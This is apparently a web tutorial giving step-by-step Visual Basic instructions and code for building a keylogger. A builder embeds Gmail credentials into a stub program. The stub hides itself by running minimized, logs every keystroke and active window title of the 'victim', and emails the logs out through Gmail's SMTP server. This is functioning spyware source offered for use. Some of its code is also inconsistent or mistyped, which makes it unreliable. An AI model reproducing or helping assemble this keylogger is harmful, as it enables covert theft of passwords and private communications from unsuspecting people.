Download Visual Basic Express Edition 2010
* Run Visual Basic
* In Tab click File > New Project
* Windows Application > "Keylogger Builder" > Click Ok
Insert the Following Text in Form Properties.
FormBorderStyle = FixedSingle
MaximizeBox = False
MinimizeBox = False
Show Icon = False
StartPosition = CenterScreen
Text = Keylogger Builder
From the Toolbox add at the Right side Add Buttons,Lables And Text
Box :
* TextBox1 - The GMail Username textbox
* Textbox2 - The Gmail Password textbox
* Button1 - The Build button, Change text to: Build
* Label1 - Change text to: Gmail Username
* Label2 - Change text to: Gmail Password
Go again to the Form Properties And Write the Below Code at the top of it.
1 | Imports System.IO |
Now In the Form Properties under Public Class Form1 add following code, that would be strings:
1 2 | Dim stub, text1, text2 As String Const FileSplit = "@keylogger@" |
Now when you done Just Open Your Form Graphically Form 1 , Then just simply double click Button1
and add:
1 2 3 4 5 6 7 8 9 10 11 12 13 | text1 = TextBox1.Text text2 = TextBox2.Text FileOpen(1, Application.StartupPath & "\Stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default) stub = Space(LOF(1)) FileGet(1, stub) FileClose(1) If File.Exists("Server.exe") Then My.Computer.FileSystem.DeleteFile("Server.exe") End If FileOpen(1, Application.StartupPath & "\Server.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default) FilePut(1, stub & FileSplit & text1 & FileSplit & text2) FileClose(1) |
* Run Visual Basic
* In Tab click File > New Project
* Windows Application > "Stub" > Click Ok
Change the following from the Properties of Form1:
FormBorderStyle = FixedToolWindow
StartPosition = CenterScreen
Text = (no text)
WindowsState = Minimized
From the Toolbox add:
* Textbox1 - KEY LOGGER(follow everything what victim write)
* Textbox2 - GMail Username
* Textbox3 - GMail Password
* Timer1 - Upload Interval
* Timer2 - Get name of window where keylogger get
* Timer3 - Get Keys
Now when you add all these, then at the top of the stub form add:
1 2 3 | Imports System.IO Imports System.Net.Mail Imports Microsoft.Win32 |
Now under Public Class Form1 add following code, that would be strings:
1 2 3 4 | Dim options(), text1, text2 As String Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer Dim result As Integer Const FileSplit = "@keylogger@" |
Then Again View your Stub Form Graphically.
1 2 3 4 5 6 7 8 9 10 11 | Dim MailSetup As New MailMessage MailSetup.Subject = My.Computer.Name & ":" MailSetup.To.Add(TextBox1.Text) MailSetup.From = New MailAddress(TextBox1.Text) MailSetup.Body = TextBox1.Text Dim SMTP As New SmtpClient("smtp.gmail.com") SMTP.Port = 587 SMTP.EnableSsl = True SMTP.Credentials = New Net.NetworkCredential(TextBox1.Text, TextBox2.Text) SMTP.Send(MailSetup) TextBox3.Clear() |
And add this as Function to source code:
1 2 3 4 5 6 7 8 9 10 11 | PPrivate Declare Function GetForegroundWindow Lib "user32.dll" () As Int32 Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Int32, ByVal lpString As String, ByVal cch As Int32) As Int32 Dim strin As String = Nothing Private Function GetActiveWindowTitle() As String Dim MyStr As String MyStr = New String(Chr(0), 100) GetWindowText(GetForegroundWindow, MyStr, 100) MyStr = MyStr.Substring(0, InStr(MyStr, Chr(0)) - 1) Return MyStr End Function |
Now double click Timer2 to get names of active windows:
1 2 3 4 | If strin <> GetActiveWindowTitle() Then TextBox1.Text = TextBox1.Text + vbNewLine & "[" & GetActiveWindowTitle() & "]:" + vbNewLine strin = GetActiveWindowTitle() End If |
Now double click Form1 and write following code:
1 2 3 4 5 6 7 8 9 10 11 | FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared) text1 = Space(LOF(1)) text2 = Space(LOF(1)) FileGet(1, text1) FileGet(1, text2) FileClose(1) options = Split(text1, FileSplit) TextBox2.Text = options(1) TextBox3.Text = options(2) Timer1.Start() Timer2.Start() |
Now double click Timer3 and past code:
1 2 3 4 5 6 7 | For i = 1 To 255 result = 0 result = GetAsyncKeyState(i) If result = -32767 Then TextBox1.Text = TextBox1.Text + Chr(i) End If Next i |
You are done!
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